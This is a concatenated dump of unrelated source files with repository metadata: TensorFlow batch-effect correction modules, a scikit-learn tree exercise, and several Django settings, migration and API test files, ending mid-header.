def __init__(self, batch_dim, h_dim=128, depth=1, dropout=0.0,
lambda_reg=0.01, n_steps=1, delay=20, name="AdvBatch"):
super(Adversarial, self).__init__(batch_dim, delay=delay, name=name)
self.h_dim = h_dim
self.depth = depth
self.dropout = dropout
self.lambda_reg = lambda_reg
self.n_steps = n_steps
def _build_regularizer(self, input_tensor, training_flag,
epoch, scope="discriminator"):
with tf.name_scope("placeholder/"):
self.batch = tf.placeholder(
dtype=tf.float32, shape=(None, self.batch_dim),
name=self.scope_safe_name
)
self.build_regularizer_scope = "%s/%s" % (scope, self.scope_safe_name)
with tf.variable_scope(self.build_regularizer_scope):
mask = tf.cast(tf.reduce_sum(self.batch, axis=1) > 0, tf.int32)
batch = tf.dynamic_partition(self.batch, mask, 2)[1]
input_tensor = tf.dynamic_partition(input_tensor, mask, 2)[1]
batch_pred = tf.identity(nn.dense(nn.mlp(
input_tensor, [self.h_dim] * self.depth,
dropout=self.dropout, training_flag=training_flag
), self.batch_dim), "batch_logit")
self.batch_d_loss = tf.cast(
epoch >= self.delay, tf.float32
) * tf.reduce_mean(
tf.nn.softmax_cross_entropy_with_logits_v2(
labels=batch, logits=batch_pred
), name="d_loss"
)
self.batch_g_loss = tf.negative(self.batch_d_loss, name="g_loss")
self.vars_to_save += tf.get_collection(
tf.GraphKeys.GLOBAL_VARIABLES, self.build_regularizer_scope)
tf.add_to_collection(tf.GraphKeys.LOSSES, self.batch_d_loss)
return self.lambda_reg * self.batch_g_loss
def _compile(self, optimizer, lr):
with tf.variable_scope("optimize/%s" % self.scope_safe_name):
optimizer = getattr(tf.train, optimizer)(lr)
control_dependencies = []
for _ in range(self.n_steps):
with tf.control_dependencies(control_dependencies):
self.step = optimizer.minimize(
self.lambda_reg * self.batch_d_loss,
var_list=tf.get_collection(
tf.GraphKeys.TRAINABLE_VARIABLES,
self.build_regularizer_scope
)
)
control_dependencies = [self.step]
tf.add_to_collection(tf.GraphKeys.UPDATE_OPS, self.step)
def _get_config(self):
return {
"h_dim": self.h_dim,
"depth": self.depth,
"dropout": self.dropout,
"lambda_reg": self.lambda_reg,
"n_steps": self.n_steps,
**super(Adversarial, self)._get_config()
}
class MNN(RMBatch):
"""
Build a batch effect correction module that uses mutual nearest neighbor
(MNN) distance regularization.
Parameters
----------
batch_dim : int
Number of batches.
n_neighbors : int
Number of nearest neighbors to use when selecting mutual nearest
neighbors, by default 5.
lambda_reg : float
Strength of batch effect correction, by default 1.0,
delay : int
How many epoches to delay before using MNN batch correction,
by default 20.
name : str
Name of the module, by default "MNNBatch".
"""
def __init__(
self, batch_dim, n_neighbors=5, lambda_reg=1.0,
delay=20, name="MNN"
):
super(MNN, self).__init__(batch_dim, delay=delay, name=name)
self.n_neighbors = n_neighbors
self.lambda_reg = lambda_reg
def _build_regularizer(self, input_tensor, training_flag, epoch, scope="MNN"):
with tf.name_scope("placeholder/"):
self.batch = tf.placeholder(dtype=tf.float32, shape=(
None, self.batch_dim
), name=self.scope_safe_name)
with tf.name_scope("%s/%s" % (scope, self.scope_safe_name)):
batches = tf.dynamic_partition(
input_tensor,
partitions=tf.argmax(self.batch, axis=1, output_type=tf.int32),
num_partitions=self.batch_dim
)
use_flags = [tf.shape(batch)[0] > 0 for batch in batches]
penalties = []
for i in range(len(batches)):
for j in range(i + 1, len(batches)):
penalties.append(tf.cond(
tf.logical_and(use_flags[i], use_flags[j]),
lambda i=i, j=j: self._cross_batch_penalty(batches[i], batches[j]),
lambda: tf.zeros((0,))
))
penalties = tf.concat(penalties, axis=0)
return tf.cast(
epoch > self.delay, tf.float32
) * self.lambda_reg * tf.reduce_mean(penalties, name="MNN_loss")
def _cross_batch_penalty(self, x, y): # MNN
x1, y0 = tf.expand_dims(x, axis=1), tf.expand_dims(y, axis=0)
xy_dist = tf.reduce_sum(tf.square(x1 - y0), axis=2)
xy_mask = tf.cast(self._mnn_mask(xy_dist, self.n_neighbors), tf.float32)
return tf.reshape(xy_dist * xy_mask, [-1])
@staticmethod
def _neighbor_mask(d, k):
n = tf.shape(d)[1]
_, idx = tf.nn.top_k(tf.negative(d), k=tf.minimum(k, n))
return tf.cast(tf.reduce_sum(tf.one_hot(idx, depth=n), axis=1), tf.bool)
@staticmethod
def _mnn_mask(d, k):
return tf.logical_and(
MNN._neighbor_mask(d, k),
tf.transpose(MNN._neighbor_mask(tf.transpose(d), k))
)
def _get_config(self):
return {
"n_neighbors": self.n_neighbors,
"lambda_reg": self.lambda_reg,
**super(MNN, self)._get_config()
}
class MNNAdversarial(Adversarial, MNN):
"""
Build a batch effect correction module that uses adversarial batch alignment
among cells with mutual nearest neighbors.
Parameters
----------
batch_dim : int
Number of batches.
h_dim : int
Dimensionality of the hidden layers in the discriminator MLP, by default 128.
depth : int
Number of hidden layers in the discriminator MLP, by default 1.
dropout : float
Dropout rate, by default 0.0.
lambda_reg : float
Strength of batch effect correction, by default 0.01,
n_steps : int
How many discriminator steps to run for each encoder step, by default 1.
n_neighbors : int
Number of nearest neighbors to use when selecting mutual nearest
neighbors, by default 5.
delay : int
How many epoches to delay before using MNN batch correction,
by default 20.
name : str
Name of the module, by default "MNNAdvBatch".
"""
def __init__(
self, batch_dim, h_dim=128, depth=1, dropout=0.0,
lambda_reg=0.01, n_steps=1, n_neighbors=5, delay=20,
name="MNNAdvBatch"
):
super(MNNAdversarial, self).__init__(
batch_dim, h_dim, depth, dropout, lambda_reg, n_steps,
delay=delay, name=name
) # Calls Adversarial.__init__
self.n_neighbors = n_neighbors
def _build_regularizer(self, input_tensor, training_flag,
epoch, scope="discriminator"):
with tf.name_scope("placeholder/"):
self.batch = tf.placeholder(
dtype=tf.float32, shape=(None, self.batch_dim),
name=self.scope_safe_name
)
self.build_regularizer_scope = "%s/%s" % (scope, self.scope_safe_name)
with tf.variable_scope(self.build_regularizer_scope):
mask = tf.cast(tf.reduce_sum(self.batch, axis=1) > 0, tf.int32)
batch = tf.dynamic_partition(self.batch, mask, 2)[1]
input_tensor = tf.dynamic_partition(input_tensor, mask, 2)[1]
input_idx = tf.expand_dims(tf.cast(
tf.range(tf.shape(input_tensor)[0]), tf.float32
), axis=1)
_input_tensor = tf.concat([input_idx, input_tensor], axis=1)
batches = tf.dynamic_partition(
_input_tensor,
partitions=tf.argmax(batch, axis=1, output_type=tf.int32),
num_partitions=self.batch_dim
)
use_flags = [tf.shape(item)[0] > 0 for item in batches]
batches = [(item[:, 0], item[:, 1:]) for item in batches]
include_idx = []
for i in range(len(batches)):
for j in range(i + 1, len(batches)):
include_idx.append(tf.cond(
tf.logical_and(use_flags[i], use_flags[j]),
lambda i=i, j=j: self._mnn_idx(batches[i], batches[j], self.n_neighbors),
lambda: (tf.zeros((0,)), tf.zeros((0,)))
))
include_idx = [j for i in include_idx for j in i] # flatten
self.include_idx = tf.unique(tf.cast(
tf.concat(include_idx, axis=0), tf.int32))[0]
input_tensor = tf.gather(input_tensor, self.include_idx)
batch = tf.gather(batch, self.include_idx)
batch_pred = tf.identity(nn.dense(nn.mlp(
input_tensor, [self.h_dim] * self.depth,
dropout=self.dropout, training_flag=training_flag
), self.batch_dim), "batch_logit")
self.batch_d_loss = tf.multiply(tf.cast(
epoch >= self.delay, tf.float32
), tf.reduce_mean(
tf.nn.softmax_cross_entropy_with_logits_v2(
labels=batch, logits=batch_pred
), name="raw_d_loss"
), name="d_loss")
self.batch_g_loss = tf.negative(self.batch_d_loss, name="g_loss")
self.vars_to_save += tf.get_collection(
tf.GraphKeys.GLOBAL_VARIABLES, self.build_regularizer_scope)
tf.add_to_collection(tf.GraphKeys.LOSSES, self.batch_d_loss)
return self.lambda_reg * self.batch_g_loss
@staticmethod
def _mnn_idx(batch1, batch2, k):
(xi, x), (yi, y) = batch1, batch2
x1, y0 = tf.expand_dims(x, axis=1), tf.expand_dims(y, axis=0)
xy_dist = tf.reduce_sum(tf.square(x1 - y0), axis=2)
xy_mask = tf.cast(MNNAdversarial._mnn_mask(xy_dist, k), tf.int32)
return (
tf.dynamic_partition(xi, tf.cast(
tf.reduce_sum(xy_mask, axis=1) > 0, tf.int32
), 2)[1],
tf.dynamic_partition(yi, tf.cast(
tf.reduce_sum(xy_mask, axis=0) > 0, tf.int32
), 2)[1]
)
# EXPERIMENTAL
class AdaptiveMNNAdversarial(MNNAdversarial):
def __init__(
self, batch_dim, h_dim=128, depth=1, dropout=0.0,
lambda_reg=0.01, n_steps=1, n_neighbors=5, delay=20,
name="AdptMNNAdvBatch"
):
super(AdaptiveMNNAdversarial, self).__init__(
batch_dim, h_dim, depth, dropout, lambda_reg, n_steps, n_neighbors,
delay=delay, name=name
)
def _build_regularizer(self, input_tensor, training_flag,
epoch, scope="discriminator"):
with tf.name_scope("placeholder/"):
self.batch = tf.placeholder(
dtype=tf.float32, shape=(None, self.batch_dim),
name=self.scope_safe_name
)
self.build_regularizer_scope = "%s/%s" % (scope, self.scope_safe_name)
with tf.variable_scope(self.build_regularizer_scope):
# Select cells with batch identity
mask = tf.cast(tf.reduce_sum(self.batch, axis=1) > 0, tf.int32)
batch = tf.dynamic_partition(self.batch, mask, 2)[1]
input_tensor = tf.dynamic_partition(input_tensor, mask, 2)[1]
# Build MNN mask
n = tf.shape(batch)[0]
input_idx = tf.expand_dims(tf.cast(tf.range(n), tf.float32), axis=1)
_input_tensor = tf.concat([input_idx, input_tensor], axis=1)
batches = tf.dynamic_partition(
_input_tensor,
partitions=tf.argmax(batch, axis=1, output_type=tf.int32),
num_partitions=self.batch_dim
)
use_flags = [tf.shape(item)[0] > 0 for item in batches]
batches = [(item[:, 0], item[:, 1:]) for item in batches]
self.mask_mat = []
for i in range(len(batches)):
for j in range(i + 1, len(batches)):
idx_mask = tf.cond(
tf.logical_and(use_flags[i], use_flags[j]),
lambda i=i, j=j: self._mnn_idx_mask(
batches[i], batches[j], self.n_neighbors, n),
lambda: tf.zeros((n,))
)
idx_mask = tf.expand_dims(idx_mask, axis=1)
self.mask_mat.append(tf.concat([
tf.zeros((n, i)), idx_mask,
tf.zeros((n, j - i - 1)), idx_mask,
tf.zeros((n, self.batch_dim - j - 1))
], axis=1))
self.mask_mat = tf.cast(tf.add_n(self.mask_mat) > 0, tf.int32)
include_mask = tf.cast(tf.reduce_sum(
self.mask_mat, axis=1
) > 0, tf.int32)
self.mask_mat = tf.dynamic_partition(self.mask_mat, include_mask, 2)[1]
batch = tf.dynamic_partition(batch, include_mask, 2)[1]
input_tensor = tf.dynamic_partition(input_tensor, include_mask, 2)[1]
# Distriminator loss
batch_pred = tf.identity(nn.dense(nn.mlp(
input_tensor, [self.h_dim] * self.depth,
dropout=self.dropout, training_flag=training_flag
), self.batch_dim), "batch_logit")
self.batch_d_loss = tf.cast(
epoch >= self.delay, tf.float32
) * tf.reduce_mean(
tf.nn.softmax_cross_entropy_with_logits_v2(
labels=batch, logits=batch_pred
), name="d_loss"
)
# Generator loss
self.batch_g_loss = tf.cast(
epoch >= self.delay, tf.float32
) * tf.negative(tf.reduce_mean(tf.scan(
self._masked_softmax_cross_entropy_with_logits,
(batch, batch_pred, self.mask_mat),
tf.zeros(()), parallel_iterations=128
)), name="g_loss")
self.vars_to_save += tf.get_collection(
tf.GraphKeys.GLOBAL_VARIABLES, self.build_regularizer_scope)
tf.add_to_collection(tf.GraphKeys.LOSSES, self.batch_d_loss)
return self.lambda_reg * self.batch_g_loss
@staticmethod
def _mnn_idx_mask(batch1, batch2, k, n):
idx1, idx2 = AdaptiveMNNAdversarial._mnn_idx(batch1, batch2, k)
idx = tf.cast(tf.concat([idx1, idx2], axis=0), tf.int32)
return tf.reduce_sum(tf.one_hot(idx, depth=n), axis=0)
@staticmethod
def _masked_softmax_cross_entropy_with_logits(cum, tensors):
labels, logits, mask = tensors
labels = tf.dynamic_partition(labels, mask, 2)[1]
logits = tf.dynamic_partition(logits, mask, 2)[1]
return tf.reduce_sum(labels * (tf.reduce_logsumexp(logits) - logits))
| [
"caozj@mail.cbi.pku.edu.cn"
] | caozj@mail.cbi.pku.edu.cn |
d9ccb81408261f7b5cc455c780766b88898ca463 | 9b452360c98fba2ff70986f498d372fcd70e5970 | /py3-battle-env/battle-expert/Toolbox_Python/Scripts/ex5_1_2.py | e3a64191ab9372aad5244d3a846a0053b8366635 | [] | no_license | ChristineAlb/Pokemon-battle-expert | 2e9ac837fb4813da2bd4c27dac1a5690e6ccc1b2 | 06a2700a020a9c12993c2824c628fe52ced186d9 | refs/heads/master | 2021-04-28T07:06:23.330276 | 2018-02-20T13:32:41 | 2018-02-20T13:32:41 | 122,212,987 | 1 | 0 | null | 2018-02-20T15:00:42 | 2018-02-20T15:00:41 | null | UTF-8 | Python | false | false | 530 | py | # exercise 5.1.2
import numpy as np
from sklearn import tree
# requires data from exercise 5.1.1
from ex5_1_1 import *
# Fit regression tree classifier, Gini split criterion, no pruning
dtc = tree.DecisionTreeClassifier(criterion='gini', min_samples_split=2)
dtc = dtc.fit(X,y)
# Export tree graph for visualization purposes:
# (note: you can use i.e. Graphviz application to visualize the file)
out = tree.export_graphviz(dtc, out_file='tree_gini.gvz', feature_names=attributeNames)
print('Ran Exercise 5.1.2') | [
"sofus@addington.dk"
] | sofus@addington.dk |
0d58ee0fc15f659c077b1143a02bb66111a89c74 | ba40a5988387b170b45b75137b896630960f3450 | /profiles/migrations/0001_initial.py | f93cfe82de101846cc8bfd406204f4f9a4bb5b50 | [] | no_license | Darian-Frey/pulchra-libri | ae3626a5042c73bc4b61e1ccbfde89d986230dcd | ae1c98609c5106a134f86fe38bf8f9cc59417278 | refs/heads/main | 2023-08-12T06:01:19.906159 | 2021-09-30T23:18:53 | 2021-09-30T23:18:53 | 400,846,753 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,416 | py | # Generated by Django 3.2.7 on 2021-09-12 20:05
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
import django_countries.fields
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='UserProfile',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('default_phone_number', models.CharField(blank=True, max_length=20, null=True)),
('default_street_address1', models.CharField(blank=True, max_length=80, null=True)),
('default_street_address2', models.CharField(blank=True, max_length=80, null=True)),
('default_town_or_city', models.CharField(blank=True, max_length=40, null=True)),
('default_county', models.CharField(blank=True, max_length=80, null=True)),
('default_postcode', models.CharField(blank=True, max_length=20, null=True)),
('default_country', django_countries.fields.CountryField(blank=True, max_length=2, null=True)),
('user', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
]
| [
"shane.hartley06@gmail.com"
] | shane.hartley06@gmail.com |
d481c50dc24610166c81237f91c3468449117087 | 80d28eaa892d0ae8548b88c9e572badceda6a622 | /thief_snapshot/__init__.py | 083a53b381b62b6a3262abc685121ecfc446e79c | [] | no_license | pawl/thief-snapshot | 7affba4e0c05841c573dda5bd07d453bdffad98f | 388660055a78e4719c920cb7db38fdc1cf7b3813 | refs/heads/master | 2020-12-03T09:35:01.714994 | 2017-07-11T02:56:28 | 2017-07-11T02:56:28 | 95,631,500 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 156 | py | import logging
logging.basicConfig(
level=logging.INFO,
format='%(asctime)s - %(levelname)s - %(message)s',
)
logger = logging.getLogger(__name__)
| [
"paul90brown@gmail.com"
] | paul90brown@gmail.com |
d0e6d6f50ccfb352a8cbc7b6885fe5f5ed7113c5 | 631fefc768f55a1e1973b82f5f5b6dc918463c85 | /resume_parser/resume_parser/settings.py | 13d35b2511db26edea008110a019aacf25403856 | [
"MIT"
] | permissive | gitamitrawat/Resume_parsing | 667857a03a78c55c0b328fe72bbe5e8d8f909e28 | c2dc1e161930538290018b46b55dd038c038b689 | refs/heads/master | 2022-11-27T18:08:07.492212 | 2020-08-09T17:19:09 | 2020-08-09T17:19:09 | 286,257,687 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,568 | py | """
Django settings for resume_parser project.
Generated by 'django-admin startproject' using Django 2.1.4.
For more information on this file, see
https://docs.djangoproject.com/en/2.1/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/2.1/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/2.1/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'fa^pq*c1#+6_(6jgxxr&2o-9bt$5u_f=aldx0yceaed3#c1b^b'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = ['*']
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'crispy_forms',
'parser_app',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'resume_parser.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [os.path.join(BASE_DIR, 'templates')],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'resume_parser.wsgi.application'
# Database
# https://docs.djangoproject.com/en/2.1/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/2.1/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/2.1/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.1/howto/static-files/
STATIC_URL = '/staticfiles/'
STATIC_ROOT = os.path.join(BASE_DIR, 'staticfiles')
#STATICFILES_DIRS = [os.path.join(BASE_DIR, 'static'), ]
# Bootstrap Crispy-Forms config
CRISPY_TEMPLATE_PACK = 'bootstrap4'
# for uploading resume files
MEDIA_ROOT = os.path.join(os.path.dirname(os.path.dirname(os.path.abspath(__file__))), 'mediafiles')
MEDIA_URL = '/mediafiles/'
LOGIN_URL = '/parser_app/user_login/'
| [
"amithunterz@gmail.com"
] | amithunterz@gmail.com |
0d1de5c81041d3e3475be8b17c283a7fa1f2bd06 | f2f2a757faf73bf27caa72beae606a8ce1b2a073 | /app/recipe/tests/test_ingredients_api.py | c8531f44430ae22eebeb986422785600eaa6ac61 | [
"MIT"
] | permissive | rohitmalik137/django-recipe-api | a144e723926da21679149b8fd09c510536c94fb7 | 824f4a48d8f60356881dabb7733270fbdb24c67a | refs/heads/main | 2023-01-14T16:53:59.492563 | 2020-11-26T15:08:28 | 2020-11-26T15:08:28 | 315,214,107 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,766 | py | from django.contrib.auth import get_user_model
from django.urls import reverse
from django.test import TestCase
from rest_framework import status
from rest_framework.test import APIClient
from core.models import Ingredient
from recipe.serializers import IngredientSerializer
INGREDIENTS_URL = reverse('recipe:ingredient-list')
class PublicIngredientsApiTests(TestCase):
"""Test the publicly available ingredients API"""
def setUp(self):
self.client = APIClient()
def test_login_required(self):
"""Test that login is required to access the endpoint"""
res = self.client.get(INGREDIENTS_URL)
self.assertEqual(res.status_code, status.HTTP_401_UNAUTHORIZED)
class PrivateIngredientsApiTests(TestCase):
"""Test the private ingredients API"""
def setUp(self):
self.client = APIClient()
self.user = get_user_model().objects.create_user(
'test@gmail.com',
'testpass'
)
self.client.force_authenticate(self.user)
def test_retieve_ingredients_list(self):
"""Test retieving list of ingredients"""
Ingredient.objects.create(user=self.user, name='test1')
Ingredient.objects.create(user=self.user, name='test2')
res = self.client.get(INGREDIENTS_URL)
ingredients = Ingredient.objects.all().order_by('-name')
serializer = IngredientSerializer(ingredients, many=True)
self.assertEqual(res.status_code, status.HTTP_200_OK)
self.assertEqual(res.data, serializer.data)
def test_ingredients_limited_to_user(self):
"""Test that ingredients returned only for the authenticated user"""
user2 = get_user_model().objects.create_user(
'other@gmail.com',
'testpass2'
)
Ingredient.objects.create(user=user2, name='Vineger')
ingredient = Ingredient.objects.create(user=self.user, name='soming')
res = self.client.get(INGREDIENTS_URL)
self.assertEqual(res.status_code, status.HTTP_200_OK)
self.assertEqual(len(res.data), 1)
self.assertEqual(res.data[0]['name'], ingredient.name)
def test_create_ingredients_successful(self):
"""Test creating a new ingredient successful"""
payload = {'name': 'Test ingredient'}
self.client.post(INGREDIENTS_URL, payload)
exists = Ingredient.objects.filter(
user=self.user,
name=payload['name']
).exists()
self.assertTrue(exists)
def test_creating_tag_invalid(self):
"""Test creating a ingredient with invalid input"""
payload = {'name': ''}
res = self.client.post(INGREDIENTS_URL, payload)
self.assertEqual(res.status_code, status.HTTP_400_BAD_REQUEST)
| [
"bpsrohitmalik@gmail.com"
] | bpsrohitmalik@gmail.com |
3e7f1c6c83a028d02680995ae90412fcde342d37 | 464068d69e461d5d21cf5cb15d470aabb024ae42 | /Logan Yang - Guessgame.py | 5da8a0a24fccdaad5677840b93831ef0b7bd39d3 | [] | no_license | 5q4z/CSE | c6c7c939dad186971920880524f2c6cc7271e393 | 977128f87defe8786345390a1fbad958057f1b7f | refs/heads/master | 2021-09-14T23:04:37.002028 | 2018-05-21T18:41:15 | 2018-05-21T18:41:15 | 112,374,914 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 310 | py | import random
# Logan Yang
a = (random.randint(1, 50))
for x in range(5):
b = input("What number am I thinking of? ")
if b == str(a):
print("Correct!")
quit()
elif b < str(a):
print("Incorrect, guess higher.")
elif b > str(a):
print("Incorrect, guess lower.")
| [
"5q4z@github.com"
] | 5q4z@github.com |
20bdfeb6ea32876cb80e95e2bed12def7f5c0cb3 | be8211ea410f91589307044a054c01948a594d54 | /M1T1_saunders.py | 62ab3f5e90a13d327064608e11250ecfef2171b8 | [] | no_license | saunderl6368/CTI110 | afa1be65c6d5c89816d26cc59a7e3907bee3cfa1 | e09507795e50f738fdf767cd97c620a905e02223 | refs/heads/master | 2021-01-22T06:49:10.727820 | 2017-12-10T22:52:19 | 2017-12-10T22:52:19 | 102,300,501 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 73 | py | #M1T1
#Hello World
#Laura Saunders
#8/26/2017
print ("Hello World")
| [
"noreply@github.com"
] | saunderl6368.noreply@github.com |
88c5efb5087541c82352cb73f2b1bcf7caf3e68b | 64a04102f0240c46bd56973d783ebf3cf02b4299 | /doubanMovie250/spiders/doubanMovie250_spider.py | 72eacbd40a96f3bda4c418d5932c06786cc586d4 | [] | no_license | mokusolo/doubanMovie250 | 81e0f54dfd7f659e607c87a86dc9415eb1028675 | ffdd6f8411dfc08524cfb57bb1ebb1400a4bed3e | refs/heads/master | 2021-05-14T00:11:24.484952 | 2018-03-07T04:21:57 | 2018-03-07T04:21:57 | 116,534,475 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,425 | py | import scrapy
from doubanMovie250.items import Doubanmovie250Item
class DoubanMovie250Spider(scrapy.Spider):
name = 'doubanMovie250'
headers = {
'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36'
}
# 使用start_requests函数而不是start_urls = ['https://movie.douban.com/top250'],对初始URL的处理有更多权利,比如给初始URL增加请求头User-Agent
def start_requests(self):
url = 'https://movie.douban.com/top250'
yield scrapy.Request(url, headers=self.headers)
def parse(self, response):
item = Doubanmovie250Item()
movies = response.xpath('//ol[@class="grid_view"]/li')
for movie in movies:
item['ranking'] = movie.xpath('.//div[@class="pic"]/em/text()').extract()[0]
item['title'] = movie.xpath('.//div[@class="hd"]/a/span[1]/text()').extract()[0]
item['score'] = movie.xpath('.//div[@class="star"]/span[@class="rating_num"]/text()').extract()[0]
item['quote'] = movie.xpath('.//p[@class="quote"]/span/text()').extract()
yield item
next_url = response.xpath('//span[@class="next"]/a/@href').extract()
if next_url:
next_url = 'https://movie.douban.com/top250' + next_url[0]
yield scrapy.Request(next_url, headers=self.headers)
| [
"liyundan3@gmail.com"
] | liyundan3@gmail.com |
b57127734749739690a92ea4af6da4fa3a1d9bd5 | 50948d4cb10dcb1cc9bc0355918478fb2841322a | /azure-mgmt-storage/azure/mgmt/storage/v2017_06_01/models/sku_py3.py | 8bb382d6481045d2cc41fe140e170b08d4bbffa6 | [
"MIT"
] | permissive | xiafu-msft/azure-sdk-for-python | de9cd680b39962702b629a8e94726bb4ab261594 | 4d9560cfd519ee60667f3cc2f5295a58c18625db | refs/heads/master | 2023-08-12T20:36:24.284497 | 2019-05-22T00:55:16 | 2019-05-22T00:55:16 | 187,986,993 | 1 | 0 | MIT | 2020-10-02T01:17:02 | 2019-05-22T07:33:46 | Python | UTF-8 | Python | false | false | 3,319 | py | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.serialization import Model
class Sku(Model):
"""The SKU of the storage account.
Variables are only populated by the server, and will be ignored when
sending a request.
All required parameters must be populated in order to send to Azure.
:param name: Required. Gets or sets the sku name. Required for account
creation; optional for update. Note that in older versions, sku name was
called accountType. Possible values include: 'Standard_LRS',
'Standard_GRS', 'Standard_RAGRS', 'Standard_ZRS', 'Premium_LRS'
:type name: str or ~azure.mgmt.storage.v2017_06_01.models.SkuName
:ivar tier: Gets the sku tier. This is based on the SKU name. Possible
values include: 'Standard', 'Premium'
:vartype tier: str or ~azure.mgmt.storage.v2017_06_01.models.SkuTier
:ivar resource_type: The type of the resource, usually it is
'storageAccounts'.
:vartype resource_type: str
:ivar kind: Indicates the type of storage account. Possible values
include: 'Storage', 'BlobStorage'
:vartype kind: str or ~azure.mgmt.storage.v2017_06_01.models.Kind
:ivar locations: The set of locations that the SKU is available. This will
be supported and registered Azure Geo Regions (e.g. West US, East US,
Southeast Asia, etc.).
:vartype locations: list[str]
:ivar capabilities: The capability information in the specified sku,
including file encryption, network acls, change notification, etc.
:vartype capabilities:
list[~azure.mgmt.storage.v2017_06_01.models.SKUCapability]
:param restrictions: The restrictions because of which SKU cannot be used.
This is empty if there are no restrictions.
:type restrictions:
list[~azure.mgmt.storage.v2017_06_01.models.Restriction]
"""
_validation = {
'name': {'required': True},
'tier': {'readonly': True},
'resource_type': {'readonly': True},
'kind': {'readonly': True},
'locations': {'readonly': True},
'capabilities': {'readonly': True},
}
_attribute_map = {
'name': {'key': 'name', 'type': 'SkuName'},
'tier': {'key': 'tier', 'type': 'SkuTier'},
'resource_type': {'key': 'resourceType', 'type': 'str'},
'kind': {'key': 'kind', 'type': 'Kind'},
'locations': {'key': 'locations', 'type': '[str]'},
'capabilities': {'key': 'capabilities', 'type': '[SKUCapability]'},
'restrictions': {'key': 'restrictions', 'type': '[Restriction]'},
}
def __init__(self, *, name, restrictions=None, **kwargs) -> None:
super(Sku, self).__init__(**kwargs)
self.name = name
self.tier = None
self.resource_type = None
self.kind = None
self.locations = None
self.capabilities = None
self.restrictions = restrictions
| [
"lmazuel@microsoft.com"
] | lmazuel@microsoft.com |
daa712434a43b1506008cb02c38d0182d39483c2 | b9c55de2b21ca781ab5522da8a1db34ed55bd644 | /django-app/member/urls.py | cee47f79b216288c4dad0072c53238b1df7520be | [] | no_license | JeongEuiJin/model-wed-p | 04a8ed2aa8145a860e214c563fcebae9d7e39692 | 9fb987f5fe65c05825c519d6ef4bd4d802e0dccb | refs/heads/master | 2021-01-21T21:05:07.169721 | 2017-06-19T12:11:51 | 2017-06-19T12:11:51 | 94,772,729 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 198 | py | from django.conf.urls import url
from . import views
urlpatterns = [
url(r'^$', views.student_list, name='student_list'),
url(r'^(?P<s_pk>\d+)/$', views.student_del, name='student_del')
]
| [
"hehar1020@gmail.com"
] | hehar1020@gmail.com |
e789385cd300ec837af0be820f02f87154600e1d | 8a4a4cab76ddf1b19a017c3e5c765caf9a5fe3cc | /test/test_remote_app_permission_update_user.py | 45ffee2297dddce630ab3389a4f5adc204e15ffc | [] | no_license | ibuler/testsdk | fa724ff129e2a6144c05b8330cd4014c8bfb9a58 | 015bc6ca7da64180a2a11756a4e7cce733aca806 | refs/heads/master | 2020-06-23T09:02:50.322517 | 2019-07-25T05:51:26 | 2019-07-25T05:51:26 | 198,577,933 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,020 | py | # coding: utf-8
"""
Jumpserver API Docs
Jumpserver Restful api docs # noqa: E501
